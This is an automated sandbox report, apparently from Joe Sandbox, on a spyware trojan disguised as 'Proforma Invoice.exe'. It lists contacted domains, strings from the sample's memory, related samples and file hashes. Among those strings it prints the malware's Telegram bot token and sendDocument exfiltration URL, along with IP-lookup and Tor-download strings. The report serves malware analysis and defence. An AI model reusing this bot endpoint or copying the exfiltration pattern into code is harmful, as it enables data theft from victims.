                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    https://api.telegram.org40%URL Reputationsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    https://api.telegram.orgD80%URL Reputationsafe
                    http://api.eve-central.com/api/marketstat0%URL Reputationsafe
                    http://api.eve-central.com/api/marketstatIDon0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://a7Yu7sNuvhjH4U.comx0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://eve.no-ip.de/prices/30d/0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://crl.micro0%URL Reputationsafe
                    http://eIoKIh.com0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://api.eve-online.com/0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocumentfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.orgProforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers?Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://a7Yu7sNuvhjH4U.comProforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000003.453167723.0000000001254000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643016652.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tiro.comProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.ipify.org%%startupfolder%Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		low
                                  http://www.goodfont.co.krProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.org4Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiProforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fonts.comProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameProforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sakkal.comProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.ipify.org%Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		low
                                      https://api.telegram.orgD8Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://api.eve-central.com/api/marketstatProforma Invoice.exefalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://api.eve-central.com/api/marketstatIDonProforma Invoice.exe, ebJpPhiwjcAviB.exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwProforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://code.google.com/p/com232termebJpPhiwjcAviB.exe.0.drfalse
                                            		high
                                            http://a7Yu7sNuvhjH4U.comxProforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.carterandcone.comlProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://eve.no-ip.de/prices/30d/Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cnProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlProforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.microProforma Invoice.exe, 00000008.00000002.647093535.0000000006865000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://eIoKIh.comProforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/Proforma Invoice.exe, 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers8Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocumentdocument-----Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://api.telegram.orgProforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://github.com/riuson/com232termebJpPhiwjcAviB.exe.0.drfalse
                                                          		high
                                                          http://api.eve-online.com/Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          		api.telegram.orgUnited Kingdom
                                                          		62041TELEGRAMRUfalse

                                                          Private

                                                          IP
                                                          192.168.2.1

                                                          General Information

                                                          Joe Sandbox Version:35.0.0 Citrine
                                                          Analysis ID:668067
                                                          Start date and time: 18/07/202210:23:182022-07-18 10:23:18 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 9m 51s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:Proforma Invoice.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:24
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@9/10@2/2
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 1.4% (good quality ratio 1.1%)
                                                          • Quality average: 63.6%
                                                          • Quality standard deviation: 33.7%
                                                          HCA Information:
                                                          • Successful, ratio: 97%
                                                          • Number of executed functions: 71
                                                          • Number of non-executed functions: 29
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Adjust boot time
                                                          • Enable AMSI

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                          • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          10:24:39API Interceptor598x Sleep call for process: Proforma Invoice.exe modified
                                                          10:24:47API Interceptor42x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          149.154.167.220DcoqBSYDmM_orim4.0may2.jsGet hashmaliciousBrowse
                                                            kEXGPQVxaG_orim4.0may2.jsGet hashmaliciousBrowse
                                                              Ordern.no291521.exeGet hashmaliciousBrowse
                                                                fortnite loader .exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Trojan.PackedNET.1449.860.exeGet hashmaliciousBrowse
                                                                    Formul#U00e1rio de pagamento.exeGet hashmaliciousBrowse
                                                                      bQQHP9ciRL.exeGet hashmaliciousBrowse
                                                                        Sales Contract.exeGet hashmaliciousBrowse
                                                                          zmFxPdjpEM_orim4.0may2.jsGet hashmaliciousBrowse
                                                                            JHnOCHtlWn.exeGet hashmaliciousBrowse
                                                                              oMzQjy3OqW.exeGet hashmaliciousBrowse
                                                                                Purchase Order 1.docGet hashmaliciousBrowse
                                                                                  Purchase Order 2.docGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.W32.AIDetectNet.01.6187.exeGet hashmaliciousBrowse
                                                                                      20220714.exeGet hashmaliciousBrowse
                                                                                        MKzkRUNb2P.exeGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Variant.Lazy.220312.8792.exeGet hashmaliciousBrowse
                                                                                            PO.jsGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.W32.AIDetectNet.01.3709.exeGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.W32.AIDetectNet.01.29916.exeGet hashmaliciousBrowse

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  api.telegram.orgDcoqBSYDmM_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  XZjqkRq0O5.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  kEXGPQVxaG_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  F2m0cKfVAV.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  viBbVXDLHd.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Ordern.no291521.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fortnite loader .exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Axmn81ncqB.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SecuriteInfo.com.Trojan.PackedNET.1449.860.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Formul#U00e1rio de pagamento.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  bQQHP9ciRL.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Sales Contract.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  zmFxPdjpEM_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  JHnOCHtlWn.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  oMzQjy3OqW.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Purchase Order 1.docGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Purchase Order 2.docGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.6187.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  20220714.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  MKzkRUNb2P.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  TELEGRAMRUDcoqBSYDmM_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  4opYwyuphU.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  94FBD83A3AB8CEFA4864FA9D969D5C8B27DBE121CB0B5.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  EzIB2Sn73D.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  tcznSskQbx.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  zr47ihfIo3.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  Avast Premium Security crack.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  a.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  setup.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  SecuriteInfo.com.Trojan.PWS.Steam.31455.11067.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  GjfOB98ZZx.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  NceSvLupCz.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  C2BLjRGYWr.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  QeTI24e25Q.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  kEXGPQVxaG_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  E65Jn7N2og.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  38zspo3ygQ.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  JuWK51esuy.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.99
                                                                                                  Ordern.no291521.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fortnite loader .exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eDcoqBSYDmM_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DHL.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DENUNCIA VIRTUAL POR FALSIFICACION DE DOCUMENTO.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  launch.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  zara.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Universal Steam Software by Amfi - [Cracked by 03 & iVally].exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  #U044f.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  obfuscated.vmp_protected.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  ExitLag_.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  6288a1de5a1db_30593f.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  cheat.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  o9o8Y7hb8P.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  kEXGPQVxaG_orim4.0may2.jsGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  imi5VDr4W0.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Ordern.no291521.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fortnite loader .exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  BrawlStars.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  DriverlessEAC.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Stealer.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220
                                                                                                  E20920A7259CABE4F4BBEF5BF983181AD47FB8C075D7F.exeGet hashmaliciousBrowse
                                                                                                  • 149.154.167.220

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Proforma Invoice.exe.log

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1402
                                                                                                  Entropy (8bit):5.336840028142602
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko8l:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzX
                                                                                                  MD5:334734FEF0BE6E3826004710EBCF7891
                                                                                                  SHA1:F4B3F06B3B2C9B95C973FBDE86A11BF4B08D7071
                                                                                                  SHA-256:ACED9D81BAA81C6C745072292E4B501F26309653EE318B0823183ABD9B51BBE0
                                                                                                  SHA-512:426D9A4D8C3A84969EDB528E17E1FED0C79526BBA4372D0650F9A04BFC60B8A793CA1C96D759A040EE03E29DCCAEE573DFFEB98BC2F113B5C8530BB125AC5F75
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22272
                                                                                                  Entropy (8bit):5.60190524695232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:KtCDe0+VTCD5ZESI5SBKnYjultI+X7Y9g9SJ3xOT1Ma7ZlbAV74wiZBDI+iyE:nDjS4KYClthD9cUCafwIVs
                                                                                                  MD5:86C4A227C4D869A2BE66CF6D61FC20F0
                                                                                                  SHA1:6219C43447A14CD9A39A9F9D8CA3536151BCF758
                                                                                                  SHA-256:93D3DF1CB161FEF87BE4940EC9DEC1B4CB0E862EFEB711746C384AE24B4E6ECB
                                                                                                  SHA-512:00B9D25EDBCF3EC45F423CFAFAC2A051266EC5B03D057EB80BA2BA0D16029FBEB95395FB0F2D0DC97D8B0D3038274058BE0BD4BF1CB1DC3FDDB578B29D60F951
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:@...e...........y.......h...N.I.F.........H..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2qvo3yn.owk.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ks5oxpdh.knr.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\tmp8D30.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1613
                                                                                                  Entropy (8bit):5.124055198955844
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2di4+S2qh/S1K2ky1mo2dUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL4xvn:cgea6YrFdOFzOzN33ODOiDdKrsuTUv
                                                                                                  MD5:9B768330FF7E87787B67395058434C5C
                                                                                                  SHA1:D292244F2F519E1A56D6E31713F1102392FFE79A
                                                                                                  SHA-256:6991984684CB56ABD1B207772DEFD79157D6D1543631D53A79C01D23052BA1E7
